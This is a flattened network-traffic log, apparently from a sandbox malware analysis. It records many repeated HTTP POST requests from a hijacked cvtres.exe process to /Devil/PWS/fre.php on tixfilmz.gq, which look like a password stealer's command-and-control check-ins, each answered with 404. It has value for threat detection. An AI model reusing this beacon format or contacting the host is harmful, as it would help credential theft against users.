                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8X6KQo82dYkatS%2BcBCkdyTBkDNWeGRqdd9pSC75IbqP2uZAs2ygYPWwCHYoZqrUk2%2FKbMp1Les9sU48HHI6vyy6krxsVLeQedAFir4dZ8v1j7KvRuBSSi3r1r83bOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ed94e67902e-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  38192.168.2.349795188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:03.020333052 CEST1277OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:03.112765074 CEST1278INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0m%2FfS5ISGxmLW63DwLudSt8bkBntVmSAwl1fBlZ0AsApI%2F6mm4%2FdqtsRSd5HAWP4gSmqm9Y0IShDOB%2FpEXiFJB6pDV6MV%2F1FJRhLnCOeDkja8t9ABhEPQBEZL7Blg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4edfe85bbbad-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  39192.168.2.349796188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:04.193279028 CEST1279OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:04.301268101 CEST1280INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KtP2dy8fexlaQThIyiOsAFsHqq%2B0ttUQMUtf%2Bo%2FhUnDVInUFReffpo44QRssr5EEPVJw5ND6LgqEgv8sldjt%2FRC%2FBYUnBVXjfLNR5TtOLJKPq%2FDp2uXFfn2FX4H17Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ee73cf3908a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.349746188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:17.452589035 CEST1033OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:17.548320055 CEST1034INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WSuTK3xmdvnC9SqK9C3Kq8XKsdf7rSOiPJ%2B%2B9ZxDB06tiwdevw3TNAATZmNMvGVEVg9KMwbf3%2BoFJ2siKx%2BGf5kYUXLsWwINIX3uVE6oCo9rZDzlcazlVHOgpMj%2Bzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dc31d919156-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  40192.168.2.349797188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:05.379364967 CEST1281OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:05.476572037 CEST1282INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9GykN9H5C7%2B6kWPZx2X1%2BpZinTzXp8bAAQqxyfjP6njGhWPbrJNJaRrV3nnXYbTuBLFh3TX4kkZicXXiyW5kQR%2F0ajt%2BmPUI5Kky386fZaDzStfpDzTH2G%2F%2FCKgimQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eeeaa9d9b98-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  41192.168.2.349798188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:06.576802969 CEST1283OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:06.684562922 CEST1284INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pGkIqTGlsgGgUzc8cR7P5DXM0Hs0xrf0h9je1L794WzRUJtN87MZfypcbWS5KD0wUcbSeNPgGa2aZHScra0ejYprzq6oZKXQPb0CAQ6BhxysZgb7gE0Cjgu1Vi9jhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ef629a168fb-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  42192.168.2.349800188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:08.046751976 CEST1290OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:08.138412952 CEST1291INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hE8CEzQWdj3ptK9qhN6wg81emsfTMM%2BEqmWsHsEIHSx7zlSJOmGskVlCQQrDAtzBvBLuoUJZLgjzpSNXiyg%2FPViPlWuyFG8Xo%2BdfrVjRID5Sr1Jx61DE44vxJamumA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eff5b029b5b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  43192.168.2.349805188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:09.287220955 CEST1303OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:09.410331011 CEST1306INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=myILvYJYcfKS7MkYcbRG7vfOYUs1um%2Fkhr6%2BNFQpqnaIxzcDc93pXsiCMCUeiqAi3OLfzM7VZ7iHLQbmcmlQRRv0LcFVg3u%2F2o%2Fw93WkjLjKm2kg%2FB43169nVbjkFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f07191bbc01-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  44192.168.2.349811188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:10.662100077 CEST1317OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:10.766151905 CEST1319INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GClypDL1lKCXN2yvye0LTL8dLrQVneuX5HUY5VQrCen5Qm0qiJd%2BWTJnBJ2Trt6Htcycx%2FlEeEVgr2D%2BKJB8BaDOT6UZdLhqzLazSRJpXJRs2xehSPM2ek9AukQTlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f0fadac8fef-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  45192.168.2.349817188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:11.901227951 CEST1330OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:12.004159927 CEST1336INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5UewRXvDfKp%2BiAauIxctOcyUA15rOOQqfcD2aL7Td1VXhCzbbOIRwUYQfH5mwqygnMaghTVhJQxczEYISVU212%2BV9pxAhaafapkIK5nFaWBgkFiZJtv4DxF9vc83pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f1768579013-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  46192.168.2.349823188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:13.321407080 CEST1385OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:13.432349920 CEST1387INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pSXrIJpk6ZpMncGD3TgB%2FqwIhl6a%2B3mRqUAwGpIWSVQH0Ee29o2ZI7BeNf8YAXl9H8yVFpgu9dtwKBr3ncuE9Vsb8gki4xjrFyLXRsgELg%2FkuxWGC9uZ7LhmsOjoJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f204d97bb5b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  47192.168.2.349828188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:14.503252029 CEST1397OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:14.600589037 CEST1398INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dv4%2BoOi5evPSAVQLTc2mUQ4pvvIG8rNRmP9Ln2E2L8om1gg9xOGAlvAjgzmpl572ZeTbGuweNIw7wAfKIF0DNqbFFiN7gv5L4L%2BLkuzsE4%2FCZv49vkcG%2B5zRo7T49w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f27ad55bbd1-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  48192.168.2.349830188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:16.837785959 CEST1440OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:16.930457115 CEST1441INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iFtawzBVjKjfrYrTAXjWWVtSP35trHD4uy6FS8qwT%2FfFHVrEe%2FTc9dBinz2ob3cQ0O7AzKwO63aMtQ1kYprOm2DWU6NovWEIH3GeGDQutnrzD%2FF3T39YT03HJTuHQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f364cc69174-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  49192.168.2.349832188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:19.747801065 CEST1484OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:19.855670929 CEST1485INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CaS9%2BYgRMKIuYHiYF9PMKotC1%2F7zwSjVypA7MoG8Z03%2FoftZ4IWHbs5M34XcrwMKqLX%2BT6SkCHkTcTD6uxax9JvlNPzGZ1SC7j5Nhhd8ZllZZu9yf4%2Bo7wJ%2F8PtS%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f487dc29189-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.349747188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:18.537200928 CEST1035OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:18.641688108 CEST1036INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IusO3PS%2BNxKdc1pE1bhnckIxsL5IUfCMg2N0ixhg1CJ8YDJ1sexeannt%2BdOuWAWENyuH9TYSsv6kia7W5E0PwtJhXkXW0Vn8XxMvKbR1Rut7thDprsdBL3x8jct0aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dc9eb03bb55-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  50192.168.2.349838188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:24.421880960 CEST1608OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:24.509193897 CEST1609INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PzEsNnNOyz3YF3aEBRXvh3K9KQvGcEvnSSCN4vPpTjroe2CdoRvCY3yd5MzLyo0CO%2FPZH15tb2Qp%2FH2lo0amjWieNCoQKt8S5G7oS%2BYRWMj1ca3dBeg96NEOgjMu1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f65af9d901f-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  51192.168.2.349840188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:28.505356073 CEST1688OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:28.641503096 CEST1689INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ASF5E3GRXofzWndMoPxJXG8e5UkQSbK%2FlNaMMjDLkTvQbD7nUo3PKgLQLe2AMHiYEUmp8dWmfsoSZL7l%2FP0svRTe1xWq78GppXcYKYNfSWHbL2xjYF8le7h%2BNUvJOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f7f2c91bbc5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  52192.168.2.349843188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:31.924021959 CEST1875OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:32.031413078 CEST1876INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YCz4l%2FWMs4%2Ft6T4roGOVmWA1AuqgTgH5jFgyCPcBhZVhhwjFBPrOMeCgA6mijAaE6gGUqOi%2FTliryZUYwdkekasVLPgmGDk%2Fv4wJoZU%2BDunFOkhmcLEolgILAEWyIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f948e719bf2-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  53192.168.2.349850188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:33.879384995 CEST1940OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:33.985601902 CEST1941INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZxzAqAPs2%2B6wkiZaXBxWxAQ4viYz%2BoQPXsrKgYYoP1o%2FilJWV3JSd4ydT7ciR4Q7LMU%2BteRlLQDJ%2FPfqQgzfvbTkPVa2pbNAYKorn7mnu1JpWy7zcn2XQ%2F2eG5suGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4fa0c8d09bda-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  54192.168.2.349852188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:38.361572981 CEST8099OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
